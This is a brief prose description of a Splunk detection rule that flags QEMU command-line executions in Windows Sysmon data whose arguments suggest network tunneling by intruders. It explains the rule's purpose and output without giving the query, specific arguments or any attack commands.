This detection rule focuses on identifying potential network tunneling attempts using QEMU, an open-source machine emulator that can host multiple operating systems as separate processes. The rule specifically targets command-line executions of QEMU with parameters that indicate possible traffic tunneling methods. Based on an analysis of intrusion activities documented by SecureList, malicious actors can leverage such QEMU commands to circumvent established security protocols and mask their network communications. The logic is implemented in Splunk, extracting relevant events from Windows Sysmon data. The detection mechanism captures events based on defined Event IDs and filters for specific command-line arguments commonly associated with network tunneling. The output provides a comprehensive view of involved processes and user activities, offering a crucial tool for recognizing unauthorized network behaviors stemming from QEMU usage.